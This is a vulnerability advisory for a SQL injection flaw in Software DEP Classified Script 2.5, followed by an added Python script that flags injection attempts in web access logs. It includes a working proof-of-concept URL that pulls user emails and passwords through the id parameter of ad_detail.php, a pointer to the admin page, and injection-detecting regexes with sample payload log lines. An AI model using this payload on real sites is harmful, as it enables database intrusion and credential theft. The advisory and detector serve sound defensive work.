Vendor: Classified Script
By: h0rd
CVSS: 9,3 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Classified Script
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:softwaredep:classified_script:2.5
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Software DEP Classified Script 2.5 SQL Injection Vulnerability

Software DEP Classified Script 2.5 contains a SQL injection vulnerability. An attacker can exploit it by sending a specially crafted SQL query to the vulnerable script; the PoC below targets the id parameter of ad_detail.php. This can allow the attacker to gain access to the database and potentially to sensitive information such as usernames and passwords.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended that users upgrade to the latest version of the software.

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Author: h0rd
Contact: h0rd[at]null.net
homepage: http://h0rd.net
download: http://www.softwaredep.com/classified-script.html
Price: $199 

PoC exploit:
http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--

login page:
http://[host]/[script]/admin/
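
A detection check for the request pattern in the PoC above, as an added example that is not part of the original advisory or the vendor's code: it scans web access log lines for requests to ad_detail.php whose id value is not a plain integer. The log lines are constructed samples, and the assumption that legitimate id values are numeric is inferred from the PoC, not stated by the vendor.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (raw spaces tolerated).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')
# SQL syntax typical of UNION-based injection; only used to raise severity.
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|--|/\*|\bconcat\s*\(", re.I | re.S)

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /ad_detail.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /ad_detail.php?id=null%20union%20select%201,2,3%20from%20user-- HTTP/1.1" 200 5333',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /ad_detail.php?id=42%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

def classify_id(value):
    """Return 'ok', 'suspicious' (non-numeric) or 'sqli' (SQL syntax present)."""
    # Assumption: a legitimate ad id consists of ASCII digits only.
    if value.isascii() and value.isdigit():
        return "ok"
    return "sqli" if SQLI_RE.search(value) else "suspicious"

def scan(lines):
    """Return (client_ip, verdict, decoded_id) for each abnormal ad_detail.php request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/ad_detail.php"):
            continue
        # parse_qs URL-decodes the value, so %20 and + both become spaces.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, value))
    return findings

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value!r}")
```

Matching on "id is not an integer" rather than on specific keywords also catches probes that carry no SQL keywords, such as a single trailing quote.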